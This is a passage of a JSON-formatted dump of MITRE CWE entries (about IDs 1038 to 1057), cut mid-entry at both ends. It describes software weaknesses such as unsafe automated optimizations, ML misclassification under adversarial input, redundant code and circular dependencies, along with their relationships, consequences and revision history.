Optimizations","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a mechanism that automatically optimizes code, e.g. to improve a characteristic such as performance, but the optimizations can have an unintended side effect that might violate an intended security assumption.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"435","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary","Description":"This weakness does not depend on other weaknesses and is the result of choices made during optimization."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"Optimizations built into the design of a product can have unintended consequences during execution."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Alter Execution Logic","Note":"The optimizations alter the order of execution resulting in side effects that were not intended by the original developer."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-03-07"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1039":{"attr":{"@_ID":"1039","@_Name":"Automated Recognition Mechanism with Inadequate Detection or Handling of Adversarial Input Perturbations","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses an automated mechanism such as machine learning to recognize complex data inputs (e.g. image or audio) as a particular concept or category, but it does not properly detect or handle inputs that have been modified or constructed in a way that causes the mechanism to detect a different, incorrect concept.","Extended_Description":{"xhtml:p":["When techniques such as machine learning are used to automatically classify input streams, and those classifications are used for security-critical decisions, then any mistake in classification can introduce a vulnerability that allows attackers to cause the product to make the wrong security decision. If the automated mechanism is not developed or \\"trained\\" with enough input data, then attackers may be able to craft malicious input that intentionally triggers the incorrect classification.","Targeted technologies include, but are not necessarily limited to:","For example, an attacker might modify road signs or road surface markings to trick autonomous vehicles into misreading the sign/marking and performing a dangerous action."],"xhtml:ul":{"xhtml:li":["automated speech recognition","automated image recognition"]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary","Description":"This weakness does not depend on other weaknesses and is the result of choices made during optimization."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"This issue can be introduced into the automated algorithm itself."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Bypass Protection Mechanism","Note":"When the automated recognition is used in a protection mechanism, an attacker may be able to craft inputs that are misinterpreted in a way that grants excess privileges."}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-16"}},{"attr":{"@_External_Reference_ID":"REF-17"}},{"attr":{"@_External_Reference_ID":"REF-15"}},{"attr":{"@_External_Reference_ID":"REF-13"}},{"attr":{"@_External_Reference_ID":"REF-14"}}]},"Notes":{"Note":{"#text":"Further investigation is needed to determine if better relationships exist or if additional organizational entries need to be created. For example, this issue might be better related to \\"recognition of input as an incorrect type,\\" which might place it as a sibling of CWE-704 (incorrect type conversion).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-03-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"1041":{"attr":{"@_ID":"1041","@_Name":"Use of Redundant Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software has multiple functions, methods, procedures, macros, etc. that\\n\\t\\t\\t\\t\\tcontain the same code.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. For example, if there are two copies of the same code, the programmer might fix a weakness in one copy while forgetting to fix the same weakness in another copy."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-19"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-19"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}}},"1042":{"attr":{"@_ID":"1042","@_Name":"Static Member Data Element outside of a Singleton Class Element","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a member element that is declared as static (but not final), in which\\n\\t\\t\\t\\t\\tits parent class element \\n\\t\\t\\t\\t\\tis not a singleton class - that is, a class element that can be used only once in\\n\\t\\t\\t\\t\\tthe \'to\' association of a Create action.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-3"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-3"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1043":{"attr":{"@_ID":"1043","@_Name":"Data Element Aggregating an Excessively Large Number of Non-Primitive Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a data element that has an excessively large\\n\\t\\t\\t\\t\\tnumber of sub-elements with non-primitive data types such as structures or aggregated objects.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"excessively large\\" may vary for each product or developer, CISQ recommends a default of 5 sub-elements."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1093","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-12"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-12"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1044":{"attr":{"@_ID":"1044","@_Name":"Architecture with Number of Horizontal Layers Outside of Expected Range","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software\'s architecture contains too many - or too few -\\n\\t\\t\\t\\t\\thorizontal layers.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"expected range\\" may vary for each product or developer, CISQ recommends a default minimum of 4 layers and maximum of 8 layers."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-9"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-9"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1045":{"attr":{"@_ID":"1045","@_Name":"Parent Class with a Virtual Destructor and a Child Class without a Virtual Destructor","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A parent class has a virtual destructor method, but the parent has a child class that does not have a virtual destructor.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, since the child might not perform essential destruction operations. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability, such as a memory leak (CWE-401)."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-17"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-17"}},{"attr":{"@_External_Reference_ID":"REF-977"}},{"attr":{"@_External_Reference_ID":"REF-978"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1046":{"attr":{"@_ID":"1046","@_Name":"Creation of Immutable Text Using String Concatenation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software creates an immutable text string using string concatenation operations.","Extended_Description":{"xhtml:p":"When building a string via a looping feature (e.g., a FOR or WHILE loop), the use of += to append to the existing string will result in the creation of a new object with each iteration. This programming pattern can be inefficient in comparison with use of text buffer data elements. This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this could be influenced to create performance problem."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-2"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-2"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1047":{"attr":{"@_ID":"1047","@_Name":"Modules with Circular Dependencies","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains modules in which one module has references that cycle back to itself, i.e., there are circular dependencies.","Extended_Description":{"xhtml:p":["As an example, with Java, this weakness might indicate cycles between packages.","This issue makes it more difficult to maintain the software due to insufficient modularity, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities.","This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-7"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-13"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-7"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-13"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1048":{"attr":{"@_ID":"1048","@_Name":"Invokable Control Element with Large Number of Outward Calls","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains callable control elements that\\n contain an excessively large number of references to other\\n application objects external to the context of the callable,\\n i.e. a Fan-Out value that is excessively large.","Extended_Description":{"xhtml:p":["While the interpretation of \\"excessively large Fan-Out value\\" may vary for each product or developer, CISQ recommends a default of 5 referenced objects.","This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-4"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-4"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}}},"1049":{"attr":{"@_ID":"1049","@_Name":"Excessive Data Query Operations in a Large Data Table","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs a data query with a large number of joins\\n\\t\\t\\t\\t\\tand sub-queries on a large data table.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"large data table\\" and \\"large number of joins or sub-queries\\" may vary for each product or developer, CISQ recommends a default of 1 million rows for a \\"large\\" data table, a default minimum of 5 joins, and a default minimum of 3 sub-queries."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-4"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-4"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1050":{"attr":{"@_ID":"1050","@_Name":"Excessive Platform Resource Consumption within a Loop","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software has a loop body or loop condition that contains a control element that directly or\\n\\t\\t\\t\\t\\tindirectly consumes platform resources, e.g. messaging, sessions, locks, or file\\n\\t\\t\\t\\t\\tdescriptors.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly. If an attacker can influence the number of iterations in the loop, then this performance problem might allow a denial of service by consuming more platform resources than intended."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-8"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-8"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1051":{"attr":{"@_ID":"1051","@_Name":"Initialization with Hard-Coded Network Resource Configuration Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software initializes data using hard-coded values that act as network resource identifiers.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, e.g. if it runs in an environment does not use the hard-coded network resource identifiers. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-18"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-18"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"1052":{"attr":{"@_ID":"1052","@_Name":"Excessive Use of Hard-Coded Literals in Initialization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software initializes a data element using a hard-coded\\n\\t\\t\\t\\t\\tliteral that is not a simple integer or static constant element.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to modify or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-3"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-3"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1053":{"attr":{"@_ID":"1053","@_Name":"Missing Documentation for Design","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not have documentation that represents how it is designed.","Extended_Description":{"xhtml:p":"This issue can make it more difficult to understand and maintain the product. It can make it more difficult and time-consuming to detect and/or fix vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}}},"1054":{"attr":{"@_ID":"1054","@_Name":"Invocation of a Control Element at an Unnecessarily Deep Horizontal Layer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code at one architectural layer invokes code that resides\\n\\t\\t\\t\\t\\tat a deeper layer than the adjacent layer, i.e., the invocation skips at least one\\n\\t\\t\\t\\t\\tlayer, and the invoked code is not part of a vertical utility layer that can be referenced from any horizontal layer.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-12"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-12"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1055":{"attr":{"@_ID":"1055","@_Name":"Multiple Inheritance from Concrete Classes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a class with inheritance from more than\\n\\t\\t\\t\\t\\tone concrete class.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1093","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-2"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-2"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1056":{"attr":{"@_ID":"1056","@_Name":"Invokable Control Element with Variadic Parameters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A named-callable or method control element has a signature that\\n\\t\\t\\t\\t\\tsupports a variable (variadic) number of parameters or arguments.","Extended_Description":{"xhtml:p":["This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability.","With variadic arguments, it can be difficult or inefficient for manual analysis to be certain of which function/method is being invoked."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-8"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-8"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1057":{"attr":{"@_ID":"1057","@_Name":"Data Access Operations Outside of Expected Data Manager Component","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a dedicated, central data manager component as required by design, but it contains code that performs data-access operations that do not use this data manager.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly than intended, since the intended central data manager may have been explicitly optimized for performance or other quality characteristics. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-11"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-11"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content 